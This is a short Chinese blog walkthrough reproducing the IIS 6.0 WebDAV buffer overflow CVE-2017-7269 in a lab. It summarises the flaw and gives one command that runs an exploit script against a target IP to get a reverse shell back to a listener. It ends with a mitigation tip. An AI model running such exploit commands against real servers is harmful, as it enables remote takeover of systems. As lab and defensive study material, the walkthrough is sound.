IIS6.0 CVE-2017-7269 漏洞復現

  • 2019 年 10 月 7 日
  • 筆記

在目前很多的攻防比賽中,IIS6.0仍然會出現,因此,我們再次再來和大家一起學習一波此漏洞的利用。

0X0 概述

Windows 2003 R2上使用IIS 6.0 爆出了0Day漏洞(CVE-2017-7269),漏洞利用PoC開始流傳,但糟糕的是這產品已經停止更新了。

微軟方面也已經確認了該漏洞:Windows Server 2003R2版本IIS6.0的WebDAV服務中的ScStoragePathFromUrl函數存在快取區溢出漏洞,遠程攻擊者通過以「If: <http://」開頭的長header PROPFIND請求,執行任意程式碼。該漏洞自2016年7、8月起就已被利用。

由於開啟WebDAV服務就存在該漏洞,所以對於目前的IIS 6.0用戶而言,可用的變通方案就是關閉WebDAV服務。

0X1:環境搭建:

Winodws Server2003,IIS開啟寫功能

物理機IP:192.168.1.2

靶 機 IP:172.16.1.17

0x2 漏洞利用

本地開啟監聽埠:

運行腳本攻擊:

python iis6.0.py 172.16.1.17 80 192.168.1.24444

查看反彈:

攻擊完成後,靶機的web服務就無法正常訪問了!不過這個時候就已經完全控制系統了!

0X3 漏洞修復

關閉讀寫功能,禁止用戶通過此功能寫入。

發送:「IIS6.0「關鍵字」獲取實驗學習驗證程式碼文件。